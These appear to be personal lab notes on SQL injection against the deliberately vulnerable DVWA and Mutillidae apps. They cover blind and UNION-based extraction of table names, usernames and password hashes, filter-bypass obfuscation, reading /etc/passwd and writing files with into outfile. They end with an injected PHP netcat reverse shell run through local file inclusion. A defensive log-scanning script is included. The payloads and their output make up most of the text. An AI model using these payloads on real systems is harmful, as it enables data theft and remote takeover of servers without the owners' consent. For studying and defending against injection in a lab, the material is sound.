
Blind SQL Injection: Doesn't display any errors to you

1' and 1=1#  -->  1' and 1=1%23   // True statement
1' and 1=0#  -->  1' and 1=0%23   // False statement


Valid:
------
192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#
192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id=1' and 1=1%23&Submit=Submit#

Invalid:
--------
192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id=1' and 1=0%23&Submit=Submit#


When we send a true statement, the page returns its normal (valid) response; when a false statement is sent, no result is displayed.

1' order by 1%23 // True Statement
----------------------------------
192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id=1' order by 1%23&Submit=Submit#

1' order by 10000%23 // False Statement
---------------------------------------
http://192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id=1%27%20order%20by%2010000%23&Submit=Submit#

Output is displayed only when a valid statement is provided, and nothing is displayed when an invalid statement is provided. So this page is vulnerable to SQL injection.

'union select 1,2%23

'union select table_name,2 from information_schema.tables%23
------------------------------------------------------------
Example:
http://192.168.149.136/dvwa/vulnerabilities/sqli_blind/?id='union select table_name,2 from information_schema.tables%23&Submit=Submit#


---------------------------------------------------------------------------------------------------------------------------------------

When true and false statements are tried and the page's response changes according to the result of the SQL, the page is vulnerable to SQL injection.

1' order by 1%23      // worked
1' order by 2%23      // worked
1' order by 2%23      // didn't work
1' order by 10000%23

So only columns 1 and 2 exist: the query returns two columns.

'union select 1,2%23
------------------------
1'union select database(),2%23
----------------------------------

Result:
ID: 1'union select database(),2#
First name: dvwa  --> database name
Surname: 2

'union select table_name,2 from information_schema.tables where table_schema= 'dvwa'%23
---------------------------------------------------------------------------------------

Result:
ID: 1'union select table_name,2 from information_schema.tables where table_schema= 'dvwa'#
First name: users
Surname: 2

'union select column_name,2 from information_schema.columns where table_name= 'users'%23
-----------------------------------------------------------------------------------------
Result:

ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: user_id
Surname: 2
ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: first_name
Surname: 2
ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: last_name
Surname: 2
ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: user
Surname: 2
ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: password
Surname: 2
ID: 1'union select column_name,2 from information_schema.columns where table_name= 'users'#
First name: avatar
Surname: 2


'union select user,password from users%23
------------------------------------------
Result:

ID: 1'union select user,password from users#
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: 1'union select user,password from users#
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: 1'union select user,password from users#
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1'union select user,password from users#
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1'union select user,password from users#
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99


-----------------------------------------------------------------------------------------------------------
============================================ DVWA MEDIUM SECURITY =========================================
-----------------------------------------------------------------------------------------------------------
1 and 1=1 // True condition

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1 and 1=1 %23&Submit=Submit#

1 and 1=2 // False condition  --> Blind SQL Worked

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1 and 1=2%23&Submit=Submit#


1 union select 1,2%23
------------------
http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1 union select 1,2%23&Submit=Submit#

Result:
ID: 1 union select 1,2
First name: admin
Surname: admin
ID: 1 union select 1,2
First name: 1
Surname: 2

So both columns 1 and 2 are displayed, and we can use either of them for output.

1 union select table_name,2 from information_schema.tables%23
-------------------------------------------------------------

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1 union select table_name,2 from information_schema.tables%23&Submit=Submit#



1 union select table_name,2 from information_schema.tables where table_schema='dvwa'%23
---------------------------------------------------------------------------------------

Some websites don't allow the quote character ('), so we need to encode the string as a hex literal (0x...) and send the request.

dvwa in hex = 0x64767761

192.168.149.136/dvwa/vulnerabilities/sqli/?id=1 union select table_name,2 from information_schema.tables where table_schema=0x64767761%23&Submit=Submit#

Result:

ID: 1 union select table_name,2 from information_schema.tables where table_schema=0x64767761#
First name: admin
Surname: admin
ID: 1 union select table_name,2 from information_schema.tables where table_schema=0x64767761#
First name: guestbook
Surname: 2
ID: 1 union select table_name,2 from information_schema.tables where table_schema=0x64767761#
First name: users
Surname: 2


-----------------------------------------------------------------------------------------------------------
========================================= CASE (Frequent Problem) ========================================
-----------------------------------------------------------------------------------------------------------

-1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1%27%20+uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23&Submit=Submit#

Multiple records are shown, so go to /var/www/html/dvwa/vulnerabilities/sqli/source/low.php,
comment out the while loop (with //) and save it.

Reload the page and you will see a single table name at a time.

-1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23
----------------------------------------------------------------------

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=-1%27%20+uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23&Submit=Submit#

Result:

ID: -1'  uNioN/**/sEleCt/**/table_name,2 fRom information_schema.tables#
First name: CHARACTER_SETS
Surname: 2

// This is done because on most websites only a single result row is displayed.
// So, to solve the problem, use the following query (limit offset,count):

1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables+limit+1,2%23
--------------------------------------------------------------------------------


http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables+limit+1,2%23&Submit=Submit#

Result:

ID: 1'  uNioN/**/sEleCt/**/table_name,2 fRom information_schema.tables limit 1,2#
First name: CHARACTER_SETS
Surname: 2


http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1%27%20+uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables+limit+2,3%23&Submit=Submit#

Result:

ID: 1'  uNioN/**/sEleCt/**/table_name,2 fRom information_schema.tables limit 2,3#
First name: COLLATIONS
Surname: 2

We can keep going: limit 3,4, limit 4,5 and so on.



1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables+where+table_schema='dvwa'+limit+2,3%23
---------------------------------------------------------------------------------------------------------

http://192.168.149.136/dvwa/vulnerabilities/sqli/?id=1' +uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables+where+table_schema='dvwa'+limit+2,3%23&Submit=Submit#

ID: 1'  uNioN/**/sEleCt/**/table_name,2 fRom information_schema.tables where table_schema='dvwa' limit 2,3#
First name: users
Surname: 2


-----------------------------------------------------------------------------------------------------------
========================================== BYPASS FILTERS =================================================
-----------------------------------------------------------------------------------------------------------
and 1=1
aNd 222=222
anD 111=111
orDeR bY 1

Bypassing space filters: use + (URL-encoded space) or /**/ (inline comment) instead of a space

union select 1,2 %23
uNioN+SelEcT+1,2+%23
uNioN/**/SeLecT/**/1,2/**/%23

/*
--
;--  end of the statement
; /*
;//
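Added here as a defender-side example (not part of the original notes): a Python scanner for web-server access logs that undoes the obfuscations in the bypass list above (mixed case, /**/ and + for spaces, %23 for #) and labels the true/false probes, ORDER BY probing, UNION/information_schema enumeration, hex-encoded strings and load_file/outfile requests walked through in these notes. The log lines, the Apache combined log format and the signature names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures for the techniques in the notes above, matched against a
# URL-decoded, lower-cased, comment-stripped parameter value.
SIGNATURES = {
    "boolean-probe":   re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b"),       # 1' and 1=1#
    "order-by-probe":  re.compile(r"\border\s+by\s+\d+\b"),                  # 1' order by 10000#
    "union-select":    re.compile(r"\bunion\s+select\b"),
    "schema-enum":     re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "hex-literal":     re.compile(r"\b0x[0-9a-f]{2,}\b"),                   # table_schema=0x64767761
    "file-read":       re.compile(r"\bload_file\s*\("),
    "file-write":      re.compile(r"\binto\s+outfile\b"),
    "comment-trailer": re.compile(r"(?:#|--|/\*)\s*$"),                     # %23 decodes to #
}
# Apache combined log format (assumed); the request target is still URL-encoded here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalize(value):
    # Undo the bypass tricks: mixed case and /**/ in place of spaces (+ is already a space).
    value = re.sub(r"/\*.*?\*/", " ", value.lower())
    return re.sub(r"\s+", " ", value).strip()

def classify(value):
    # Names of every signature that matches one decoded parameter value.
    norm = normalize(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]

def scan_log(lines):
    # Returns (client_ip, parameter, normalized_value, labels) per flagged parameter.
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            labels = classify(value)
            # A trailing comment alone is weak evidence; require a query-shaping signature too.
            if any(label != "comment-trailer" for label in labels):
                hits.append((m["ip"], name, normalize(value), labels))
    return hits

# Constructed sample log lines modelled on the requests in the notes (not real traffic).
SAMPLE_LOG = [
    '192.168.149.148 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4321',
    '192.168.149.148 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%201=1%23&Submit=Submit HTTP/1.1" 200 4321',
    '192.168.149.148 - - [01/Jan/2024:10:00:03 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20order%20by%2010000%23&Submit=Submit HTTP/1.1" 200 4100',
    '192.168.149.148 - - [01/Jan/2024:10:00:04 +0000] "GET /dvwa/vulnerabilities/sqli/?id=-1%27+uNioN/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23&Submit=Submit HTTP/1.1" 200 4400',
    '192.168.149.148 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1+union+select+table_name,2+from+information_schema.tables+where+table_schema=0x64767761%23&Submit=Submit HTTP/1.1" 200 4500',
    '192.168.149.148 - - [01/Jan/2024:10:00:06 +0000] "GET /mutillidae/index.php?page=user-info.php&username=admin%27+union+select+null,load_file(%27/etc/passwd%27),null,null,null%23&password=x HTTP/1.1" 200 5000',
]
```

Calling scan_log(SAMPLE_LOG) flags five of the six lines (the plain id=1 request is clean); a real deployment would read the log file line by line and alert per client IP.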

-----------------------------------------------------------------------------------------------------------
======================================== File Upload SQL Vulnerability ====================================
-----------------------------------------------------------------------------------------------------------

Read a file on the server:
--------------------------------------------------------------
' union select null,load_file('/etc/passwd'),null,null,null%23
--------------------------------------------------------------

http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin' union select null,load_file('/etc/passwd'),null,null,null%23&password=password&user-info-php-submit-button=View+Account+Details


Write a file onto the server:

' union select null,'example example', null,null,null into outfile '/var/www/example.txt'

192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin' union select null,'example example', null,null,null into outfile '/tmp/example.txt'%23&password=password&user-info-php-submit-button=View+Account+Details


-----------------------------------------------------------------------------------------------------------
================================ Reverse Shell SQL Vulnerability ==========================================
-----------------------------------------------------------------------------------------------------------

'union select 1,2 %23

-1 = an id that matches no real row, so no "admin / admin" row is returned and only the union'd values are displayed


-1'union select '<?passthru("nc -e /bin/sh Attacker_IP 8080");?>',null into outfile '/tmp/reverse.php'%23

-----------------------------------------------------------------------------------------------------------
-1'union select '<?passthru("nc -e /bin/sh 192.168.149.148 8080");?>',null into outfile '/tmp/reverse.php'%23
-----------------------------------------------------------------------------------------------------------

192.168.149.136/dvwa/vulnerabilities/sqli/?id=-1'union select '<?passthru("nc -e /bin/sh 192.168.149.148 8888");?>',null into outfile '/tmp/reverse1.php'%23&Submit=Submit#


in terminal
--> nc -vv -l -p 8888

Now you need to run the file that we uploaded to the tmp directory.
You need not be on the same website, but it must be on the same web server.


Find a local file inclusion vulnerability on the same server (it need not be on the same website):

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../tmp/reverse1.php

That's it, the reverse shell connection is established.



